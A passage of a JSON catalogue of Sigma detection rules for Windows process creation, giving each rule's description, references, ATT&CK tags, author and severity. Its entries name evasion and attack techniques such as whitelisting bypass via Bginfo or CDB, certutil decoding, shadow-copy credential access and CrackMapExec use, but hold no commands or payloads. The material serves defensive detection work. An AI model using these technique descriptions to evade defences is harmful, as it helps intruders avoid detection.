"refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", - "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.persistence", - "attack.t1542.003" - ], - "creation_date": "2019/02/07", - "filename": "proc_creation_win_susp_bcdedit.yml", - "author": "@neu5ron", - "level": "medium", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", - "value": "Application Whitelisting Bypass via Bginfo", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", - "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_bginfo.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", - "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", - "value": "Suspicious Bitstransfer via PowerShell", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.persistence", - "attack.t1197" - ], - "creation_date": "2021/08/19", - "filename": "proc_creation_win_susp_bitstransfer.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", - "uuid": "2887e914-ce96-435f-8105-593937e90757", - "value": "Reconnaissance Activity Using BuiltIn Commands", - "meta": { - "refs": [ - "https://twitter.com/haroonmeer/status/939099379834658817", - "https://twitter.com/c_APT_ure/status/939475433711722497", - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ], - "creation_date": "2018/08/22", - "filename": "proc_creation_win_susp_builtin_commands_recon.yml", - "author": "Florian Roth, Markus Neis", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", - "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "value": "Suspicious Calculator Usage", - "meta": { - "refs": [ - "https://twitter.com/ItsReallyNick/status/1094080242686312448", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2019/02/09", - "filename": "proc_creation_win_susp_calc.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Launch 64-bit shellcode from a debugger script file using cdb.exe.", - "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", - "value": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", - "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", - "https://twitter.com/nas_bench/status/1534957360032120833", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cdb.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1218", - "attack.t1127" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_cdb.yml", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use of debugging tools" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code", - "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", - "value": "Suspicious Certutil Command Usage", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/835149808817991680", - "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", - "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", - "https://twitter.com/egre55/status/1087685529016193025", - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.command_and_control", - "attack.t1105", - "attack.s0160", - "attack.g0007", - "attack.g0010", - "attack.g0045", - "attack.g0049", - "attack.g0075", - "attack.g0096" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_certutil_command.yml", - "author": "Florian Roth, juju4, keepwatch", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", - "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "value": "Certutil Encode", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2019/02/24", - "filename": "proc_creation_win_susp_certutil_encode.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", - "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79", - "value": "Obfuscated Command Line Using Special Unicode Characters", - "meta": { - "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/01/15", - "filename": "proc_creation_win_susp_char_in_cmd.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "value": "Suspicious Child Process Created as System", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://github.com/antonioCoco/RogueWinRM", - "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_child_process_as_system_.yml", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "uuid": "4b046706-5789-4673-b111-66f25fe99534", - "value": "Overwrite Deleted Data with Cipher", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/12/26", - "filename": "proc_creation_win_susp_cipher.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process that use escape characters", - "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", - "value": "Suspicious Commandline Escape", - "meta": { - "refs": [ - "https://twitter.com/vysecurity/status/885545634958385153", - "https://twitter.com/Hexacorn/status/885553465417756673", - "https://twitter.com/Hexacorn/status/885570278637678592", - "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", - "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2018/12/11", - "filename": "proc_creation_win_susp_cli_escape.yml", - "author": "juju4", - "level": "low", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", - "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "value": "Suspicious CLSID Folder Name In Suspicious Locations", - "meta": { - "refs": [ - "https://twitter.com/Kostastsale/status/1565257924204986369", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_susp_clsid_foldername.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some FP is expected with some installers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "uuid": "178e615d-e666-498b-9630-9ed363038101", - "value": "Suspicious Elevated System Shell", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/12/05", - "filename": "proc_creation_win_susp_cmd.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", - "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", - "value": "Suspicious Cmd Execution via WMI", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", - "value": "Command Line Execution with Suspicious URL and AppData Strings", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", - "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_cmd_http_appdata.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "High" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "value": "Copy from Volume Shadow Copy", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/08/09", - "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "medium", - "falsepositive": [ - "Some rare backup scenarios" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of chcp to look up the system locale value as part of host discovery", - "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", - "value": "CHCP CodePage Locale Lookup", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1614.001" - ], - "creation_date": "2022/02/21", - "filename": "proc_creation_win_susp_codepage_lookup.yml", - "author": "_pete_0, TheDFIRReport", - "level": "high", - "falsepositive": [ - "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", - "value": "Suspicious Code Page Switch", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", - "https://twitter.com/cglyer/status/1183756892952248325", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" - ], - "tags": [ - "attack.t1036", - "attack.defense_evasion" - ], - "creation_date": "2019/10/14", - "filename": "proc_creation_win_susp_codepage_switch.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "Administrative activity (adjust code pages according to your organisation's region)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", - "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", - "value": "Suspicious Characters in CommandLine", - "meta": { - "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/27", - "filename": "proc_creation_win_susp_commandline_chars.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", - "value": "Suspicious RunAs-Like Flag Combination", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml" - ], - "tags": "No established tags", - "creation_date": "2022/11/11", - "filename": "proc_creation_win_susp_command_flag_pattern.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line arguments of common data compression tools", - "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "value": "Suspicious Compression Tool Parameters", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1184067445612535811", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2019/10/15", - "filename": "proc_creation_win_susp_compression_params.yml", - "author": "Florian Roth, Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", - "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", - "value": "Conhost Parent Process Executions", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2020/10/25", - "filename": "proc_creation_win_susp_conhost.yml", - "author": "omkar72", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application", - "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", - "value": "Suspicious Conhost Legacy Option", - "meta": { - "refs": [ - "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/04/04", - "filename": "proc_creation_win_susp_conhost_option.yml", - "author": "frack113", - "level": "informational", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation", - "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", - "value": "CVE-2021-40444 Process Pattern", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", - "https://twitter.com/neonprimetime/status/1435584010202255375", - "https://www.joesandbox.com/analysis/476188/1/iochtml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2021/09/08", - "filename": "proc_creation_win_susp_control_cve_2021_40444.yml", - "author": "@neonprimetime, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "value": "Suspicious Control Panel DLL Load", - "meta": { - "refs": [ - "https://twitter.com/rikvduijn/status/853251879320662017", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2017/04/15", - "filename": "proc_creation_win_susp_control_dll_load.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "value": "Copy from Admin Share", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1211636381086339073", - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" - ], - "creation_date": "2019/12/30", - "filename": "proc_creation_win_susp_copy_lateral_movement.yml", - "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", - "value": "Suspicious Copy From or To System32", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2020/07/03", - "filename": "proc_creation_win_susp_copy_system32.yml", - "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", - "level": "medium", - "falsepositive": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command lines used in Covenant luanchers", - "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "value": "Covenant Launcher Indicators", - "meta": { - "refs": [ - "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" - ], - "creation_date": "2020/06/04", - "filename": "proc_creation_win_susp_covenant.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect various execution methods of the CrackMapExec pentesting framework", - "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", - "value": "CrackMapExec Command Execution", - "meta": { - "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" - ], - "creation_date": "2020/05/22", - "filename": "proc_creation_win_susp_crackmapexec_execution.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "value": "CrackMapExec Command Line Flags", - "meta": { - "refs": [ - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/25", - "filename": "proc_creation_win_susp_crackmapexec_flags.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "value": "CrackMapExec PowerShell Obfuscation", - "meta": { - "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec", - "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" - ], - "creation_date": "2020/05/22", - "filename": "proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "value": "Suspicious Parent of Csc.exe", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1094924091256176641", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" - ], - "creation_date": "2019/02/11", - "filename": "proc_creation_win_susp_csc.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse Visual Basic (VB) for execution", - "uuid": "23250293-eed5-4c39-b57a-841c8933a57d", - "value": "Cscript Visual Basic Script Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cscript_vbs.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "creation_date": "2022/01/02", - "filename": "proc_creation_win_susp_cscript_vbs.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", - "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", - "value": "Suspicious Csc.exe Source File Folder", - "meta": { - "refs": [ - "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", - "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", - "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", - "https://twitter.com/gN3mes1s/status/1206874118282448897", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], - "creation_date": "2019/08/24", - "filename": "proc_creation_win_susp_csc_folder.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the lesser known remote execution tool named CsExec (a PsExec alternative)", - "uuid": "d08a2711-ee8b-4323-bdec-b7d85e892b31", - "value": "CsExec Remote Execution Tool Usage", - "meta": { - "refs": [ - "https://github.com/malcomvetter/CSExec", - 